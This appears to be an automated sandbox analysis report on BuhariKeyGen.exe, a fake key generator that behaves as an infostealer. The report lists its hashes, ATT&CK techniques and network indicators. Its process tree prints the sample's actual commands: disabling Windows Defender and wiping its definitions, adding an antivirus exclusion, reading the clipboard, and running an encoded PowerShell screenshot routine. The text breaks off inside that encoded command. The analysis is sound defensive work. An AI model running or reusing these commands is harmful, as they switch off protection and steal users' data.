9c5e3df7c7a2750b106dc50871d9e896081f473ead5c10dccdfb1e4886e8c708

Analysis

max time kernel
149s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
09-12-2024 20:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BuhariKeyGen.exe
Size

6.0MB
MD5

d2f7d0fd631a500f39c763112d9cc012
SHA1

88a1a52c9505e67f833e7ea37d745b2f195f0ee1
SHA256

9c5e3df7c7a2750b106dc50871d9e896081f473ead5c10dccdfb1e4886e8c708
SHA512

5379c49ace62615ed5d8a4f5772131269f56ac3d14d2465f01df5a47c0363d2faf0f2261263023f1b1882400913d703e465f469fe7de6e0cc9959bd838aa22fc
SSDEEP

98304:qMIu4+DcdvtamaHl3Ne4i3gDUZnhhM7M+yvFaW9cIzaF6ARwDtyDe2HdMlq3yMXL:qPp+DmgeNoInY7/sHfbRy9qlqHTn

Score

8^/10

collection credential_access defense_evasion discovery execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2260	powershell.exe
4720	powershell.exe
3168	powershell.exe
3536	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2700	cmd.exe
3632	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
336	rar.exe

Loads dropped DLL 16 IoCs

pid	Process
1696	BuhariKeyGen.exe
1696	BuhariKeyGen.exe
1696	BuhariKeyGen.exe
1696	BuhariKeyGen.exe
1696	BuhariKeyGen.exe
1696	BuhariKeyGen.exe
1696	BuhariKeyGen.exe
1696	BuhariKeyGen.exe
1696	BuhariKeyGen.exe
1696	BuhariKeyGen.exe
1696	BuhariKeyGen.exe
1696	BuhariKeyGen.exe
1696	BuhariKeyGen.exe
1696	BuhariKeyGen.exe
1696	BuhariKeyGen.exe
1696	BuhariKeyGen.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
19	discord.com
20	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
1292	tasklist.exe
2872	tasklist.exe
2988	tasklist.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023baf-21.dat	upx
behavioral2/memory/1696-25-0x00007FFE09F70000-0x00007FFE0A3DE000-memory.dmp	upx
behavioral2/files/0x000a000000023ba2-27.dat	upx
behavioral2/files/0x000a000000023bad-30.dat	upx
behavioral2/memory/1696-48-0x00007FFE134E0000-0x00007FFE134EF000-memory.dmp	upx
behavioral2/memory/1696-47-0x00007FFE0DBA0000-0x00007FFE0DBC4000-memory.dmp	upx
behavioral2/files/0x000a000000023ba9-46.dat	upx
behavioral2/files/0x000a000000023ba8-45.dat	upx
behavioral2/files/0x000a000000023ba7-44.dat	upx
behavioral2/files/0x000a000000023ba6-43.dat	upx
behavioral2/files/0x000a000000023ba5-42.dat	upx
behavioral2/files/0x000a000000023ba4-41.dat	upx
behavioral2/files/0x000a000000023ba3-40.dat	upx
behavioral2/files/0x000a000000023ba1-39.dat	upx
behavioral2/files/0x000b000000023bb4-38.dat	upx
behavioral2/files/0x000b000000023bb3-37.dat	upx
behavioral2/files/0x000b000000023bb2-36.dat	upx
behavioral2/files/0x000a000000023bae-33.dat	upx
behavioral2/files/0x000a000000023bac-32.dat	upx
behavioral2/memory/1696-54-0x00007FFE0A5D0000-0x00007FFE0A5FD000-memory.dmp	upx
behavioral2/memory/1696-60-0x00007FFDFAEA0000-0x00007FFDFB009000-memory.dmp	upx
behavioral2/memory/1696-59-0x00007FFE0A5B0000-0x00007FFE0A5CF000-memory.dmp	upx
behavioral2/memory/1696-56-0x00007FFE0A790000-0x00007FFE0A7A9000-memory.dmp	upx
behavioral2/memory/1696-64-0x00007FFE09DE0000-0x00007FFE09DED000-memory.dmp	upx
behavioral2/memory/1696-62-0x00007FFE0A4A0000-0x00007FFE0A4B9000-memory.dmp	upx
behavioral2/memory/1696-67-0x00007FFE09DB0000-0x00007FFE09DDE000-memory.dmp	upx
behavioral2/memory/1696-66-0x00007FFE09F70000-0x00007FFE0A3DE000-memory.dmp	upx
behavioral2/memory/1696-72-0x00007FFE0DBA0000-0x00007FFE0DBC4000-memory.dmp	upx
behavioral2/memory/1696-76-0x00007FFE0A7F0000-0x00007FFE0A7FD000-memory.dmp	upx
behavioral2/memory/1696-78-0x00007FFDFB0E0000-0x00007FFDFB1F8000-memory.dmp	upx
behavioral2/memory/1696-75-0x00007FFE0F4D0000-0x00007FFE0F4E4000-memory.dmp	upx
behavioral2/memory/1696-71-0x00007FFE0A600000-0x00007FFE0A6B8000-memory.dmp	upx
behavioral2/memory/1696-70-0x00007FFDFA560000-0x00007FFDFA8D5000-memory.dmp	upx
behavioral2/memory/1696-99-0x00007FFDFAEA0000-0x00007FFDFB009000-memory.dmp	upx
behavioral2/memory/1696-98-0x00007FFE0A5B0000-0x00007FFE0A5CF000-memory.dmp	upx
behavioral2/memory/1696-203-0x00007FFE0A4A0000-0x00007FFE0A4B9000-memory.dmp	upx
behavioral2/memory/1696-222-0x00007FFDFA560000-0x00007FFDFA8D5000-memory.dmp	upx
behavioral2/memory/1696-221-0x00007FFE09DB0000-0x00007FFE09DDE000-memory.dmp	upx
behavioral2/memory/1696-223-0x00007FFE0A600000-0x00007FFE0A6B8000-memory.dmp	upx
behavioral2/memory/1696-247-0x00007FFE0DBA0000-0x00007FFE0DBC4000-memory.dmp	upx
behavioral2/memory/1696-252-0x00007FFDFAEA0000-0x00007FFDFB009000-memory.dmp	upx
behavioral2/memory/1696-251-0x00007FFE0A5B0000-0x00007FFE0A5CF000-memory.dmp	upx
behavioral2/memory/1696-246-0x00007FFE09F70000-0x00007FFE0A3DE000-memory.dmp	upx
behavioral2/memory/1696-261-0x00007FFE09F70000-0x00007FFE0A3DE000-memory.dmp	upx
behavioral2/memory/1696-289-0x00007FFDFB0E0000-0x00007FFDFB1F8000-memory.dmp	upx
behavioral2/memory/1696-288-0x00007FFDFA560000-0x00007FFDFA8D5000-memory.dmp	upx
behavioral2/memory/1696-287-0x00007FFE0F4D0000-0x00007FFE0F4E4000-memory.dmp	upx
behavioral2/memory/1696-286-0x00007FFE0A600000-0x00007FFE0A6B8000-memory.dmp	upx
behavioral2/memory/1696-285-0x00007FFE0A7F0000-0x00007FFE0A7FD000-memory.dmp	upx
behavioral2/memory/1696-284-0x00007FFE09DB0000-0x00007FFE09DDE000-memory.dmp	upx
behavioral2/memory/1696-283-0x00007FFE09DE0000-0x00007FFE09DED000-memory.dmp	upx
behavioral2/memory/1696-282-0x00007FFE0A4A0000-0x00007FFE0A4B9000-memory.dmp	upx
behavioral2/memory/1696-281-0x00007FFDFAEA0000-0x00007FFDFB009000-memory.dmp	upx
behavioral2/memory/1696-280-0x00007FFE0A5B0000-0x00007FFE0A5CF000-memory.dmp	upx
behavioral2/memory/1696-279-0x00007FFE0A790000-0x00007FFE0A7A9000-memory.dmp	upx
behavioral2/memory/1696-278-0x00007FFE0A5D0000-0x00007FFE0A5FD000-memory.dmp	upx
behavioral2/memory/1696-277-0x00007FFE0DBA0000-0x00007FFE0DBC4000-memory.dmp	upx
behavioral2/memory/1696-276-0x00007FFE134E0000-0x00007FFE134EF000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2980	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4288	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

pid	Process
2260	powershell.exe
3536	powershell.exe
3536	powershell.exe
3632	powershell.exe
3632	powershell.exe
2260	powershell.exe
2260	powershell.exe
3632	powershell.exe
2460	powershell.exe
2460	powershell.exe
2460	powershell.exe
4720	powershell.exe
4720	powershell.exe
4824	powershell.exe
4824	powershell.exe
3168	powershell.exe
3168	powershell.exe
2976	powershell.exe
2976	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2260	powershell.exe
Token: SeDebugPrivilege	3536	powershell.exe
Token: SeDebugPrivilege	2988	tasklist.exe
Token: SeDebugPrivilege	2872	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3608	WMIC.exe
Token: SeSecurityPrivilege	3608	WMIC.exe
Token: SeTakeOwnershipPrivilege	3608	WMIC.exe
Token: SeLoadDriverPrivilege	3608	WMIC.exe
Token: SeSystemProfilePrivilege	3608	WMIC.exe
Token: SeSystemtimePrivilege	3608	WMIC.exe
Token: SeProfSingleProcessPrivilege	3608	WMIC.exe
Token: SeIncBasePriorityPrivilege	3608	WMIC.exe
Token: SeCreatePagefilePrivilege	3608	WMIC.exe
Token: SeBackupPrivilege	3608	WMIC.exe
Token: SeRestorePrivilege	3608	WMIC.exe
Token: SeShutdownPrivilege	3608	WMIC.exe
Token: SeDebugPrivilege	3608	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3608	WMIC.exe
Token: SeRemoteShutdownPrivilege	3608	WMIC.exe
Token: SeUndockPrivilege	3608	WMIC.exe
Token: SeManageVolumePrivilege	3608	WMIC.exe
Token: 33	3608	WMIC.exe
Token: 34	3608	WMIC.exe
Token: 35	3608	WMIC.exe
Token: 36	3608	WMIC.exe
Token: SeDebugPrivilege	3632	powershell.exe
Token: SeDebugPrivilege	1292	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3608	WMIC.exe
Token: SeSecurityPrivilege	3608	WMIC.exe
Token: SeTakeOwnershipPrivilege	3608	WMIC.exe
Token: SeLoadDriverPrivilege	3608	WMIC.exe
Token: SeSystemProfilePrivilege	3608	WMIC.exe
Token: SeSystemtimePrivilege	3608	WMIC.exe
Token: SeProfSingleProcessPrivilege	3608	WMIC.exe
Token: SeIncBasePriorityPrivilege	3608	WMIC.exe
Token: SeCreatePagefilePrivilege	3608	WMIC.exe
Token: SeBackupPrivilege	3608	WMIC.exe
Token: SeRestorePrivilege	3608	WMIC.exe
Token: SeShutdownPrivilege	3608	WMIC.exe
Token: SeDebugPrivilege	3608	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3608	WMIC.exe
Token: SeRemoteShutdownPrivilege	3608	WMIC.exe
Token: SeUndockPrivilege	3608	WMIC.exe
Token: SeManageVolumePrivilege	3608	WMIC.exe
Token: 33	3608	WMIC.exe
Token: 34	3608	WMIC.exe
Token: 35	3608	WMIC.exe
Token: 36	3608	WMIC.exe
Token: SeDebugPrivilege	2460	powershell.exe
Token: SeDebugPrivilege	4720	powershell.exe
Token: SeDebugPrivilege	4824	powershell.exe
Token: SeIncreaseQuotaPrivilege	880	WMIC.exe
Token: SeSecurityPrivilege	880	WMIC.exe
Token: SeTakeOwnershipPrivilege	880	WMIC.exe
Token: SeLoadDriverPrivilege	880	WMIC.exe
Token: SeSystemProfilePrivilege	880	WMIC.exe
Token: SeSystemtimePrivilege	880	WMIC.exe
Token: SeProfSingleProcessPrivilege	880	WMIC.exe
Token: SeIncBasePriorityPrivilege	880	WMIC.exe
Token: SeCreatePagefilePrivilege	880	WMIC.exe
Token: SeBackupPrivilege	880	WMIC.exe
Token: SeRestorePrivilege	880	WMIC.exe
Token: SeShutdownPrivilege	880	WMIC.exe
Token: SeDebugPrivilege	880	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4856 wrote to memory of 1696	4856	BuhariKeyGen.exe	82
PID 4856 wrote to memory of 1696	4856	BuhariKeyGen.exe	82
PID 1696 wrote to memory of 2244	1696	BuhariKeyGen.exe	83
PID 1696 wrote to memory of 2244	1696	BuhariKeyGen.exe	83
PID 1696 wrote to memory of 3696	1696	BuhariKeyGen.exe	84
PID 1696 wrote to memory of 3696	1696	BuhariKeyGen.exe	84
PID 1696 wrote to memory of 316	1696	BuhariKeyGen.exe	87
PID 1696 wrote to memory of 316	1696	BuhariKeyGen.exe	87
PID 1696 wrote to memory of 3896	1696	BuhariKeyGen.exe	88
PID 1696 wrote to memory of 3896	1696	BuhariKeyGen.exe	88
PID 3696 wrote to memory of 2260	3696	cmd.exe	91
PID 3696 wrote to memory of 2260	3696	cmd.exe	91
PID 2244 wrote to memory of 3536	2244	cmd.exe	92
PID 2244 wrote to memory of 3536	2244	cmd.exe	92
PID 1696 wrote to memory of 1372	1696	BuhariKeyGen.exe	93
PID 1696 wrote to memory of 1372	1696	BuhariKeyGen.exe	93
PID 1696 wrote to memory of 2700	1696	BuhariKeyGen.exe	94
PID 1696 wrote to memory of 2700	1696	BuhariKeyGen.exe	94
PID 1696 wrote to memory of 4844	1696	BuhariKeyGen.exe	95
PID 1696 wrote to memory of 4844	1696	BuhariKeyGen.exe	95
PID 3896 wrote to memory of 2872	3896	cmd.exe	98
PID 3896 wrote to memory of 2872	3896	cmd.exe	98
PID 316 wrote to memory of 2988	316	cmd.exe	100
PID 316 wrote to memory of 2988	316	cmd.exe	100
PID 1696 wrote to memory of 232	1696	BuhariKeyGen.exe	101
PID 1696 wrote to memory of 232	1696	BuhariKeyGen.exe	101
PID 1696 wrote to memory of 4260	1696	BuhariKeyGen.exe	103
PID 1696 wrote to memory of 4260	1696	BuhariKeyGen.exe	103
PID 1696 wrote to memory of 4600	1696	BuhariKeyGen.exe	105
PID 1696 wrote to memory of 4600	1696	BuhariKeyGen.exe	105
PID 1372 wrote to memory of 3608	1372	cmd.exe	107
PID 1372 wrote to memory of 3608	1372	cmd.exe	107
PID 2700 wrote to memory of 3632	2700	cmd.exe	108
PID 2700 wrote to memory of 3632	2700	cmd.exe	108
PID 4844 wrote to memory of 1292	4844	cmd.exe	110
PID 4844 wrote to memory of 1292	4844	cmd.exe	110
PID 4260 wrote to memory of 4288	4260	cmd.exe	111
PID 4260 wrote to memory of 4288	4260	cmd.exe	111
PID 232 wrote to memory of 3164	232	cmd.exe	131
PID 232 wrote to memory of 3164	232	cmd.exe	131
PID 4600 wrote to memory of 2460	4600	cmd.exe	113
PID 4600 wrote to memory of 2460	4600	cmd.exe	113
PID 1696 wrote to memory of 760	1696	BuhariKeyGen.exe	114
PID 1696 wrote to memory of 760	1696	BuhariKeyGen.exe	114
PID 760 wrote to memory of 840	760	cmd.exe	116
PID 760 wrote to memory of 840	760	cmd.exe	116
PID 1696 wrote to memory of 2348	1696	BuhariKeyGen.exe	117
PID 1696 wrote to memory of 2348	1696	BuhariKeyGen.exe	117
PID 2348 wrote to memory of 1244	2348	cmd.exe	119
PID 2348 wrote to memory of 1244	2348	cmd.exe	119
PID 1696 wrote to memory of 3444	1696	BuhariKeyGen.exe	120
PID 1696 wrote to memory of 3444	1696	BuhariKeyGen.exe	120
PID 2460 wrote to memory of 4116	2460	powershell.exe	122
PID 2460 wrote to memory of 4116	2460	powershell.exe	122
PID 3444 wrote to memory of 1236	3444	cmd.exe	123
PID 3444 wrote to memory of 1236	3444	cmd.exe	123
PID 1696 wrote to memory of 3612	1696	BuhariKeyGen.exe	142
PID 1696 wrote to memory of 3612	1696	BuhariKeyGen.exe	142
PID 3612 wrote to memory of 1964	3612	cmd.exe	126
PID 3612 wrote to memory of 1964	3612	cmd.exe	126
PID 1696 wrote to memory of 3816	1696	BuhariKeyGen.exe	127
PID 1696 wrote to memory of 3816	1696	BuhariKeyGen.exe	127
PID 4116 wrote to memory of 3244	4116	csc.exe	129
PID 4116 wrote to memory of 3244	4116	csc.exe	129

C:\Users\Admin\AppData\Local\Temp\BuhariKeyGen.exe
"C:\Users\Admin\AppData\Local\Temp\BuhariKeyGen.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4856
- C:\Users\Admin\AppData\Local\Temp\BuhariKeyGen.exe
  "C:\Users\Admin\AppData\Local\Temp\BuhariKeyGen.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BuhariKeyGen.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2244
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BuhariKeyGen.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3696
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:316
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3896
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1372
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:2700
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4844
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:232
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4260
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4600
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAA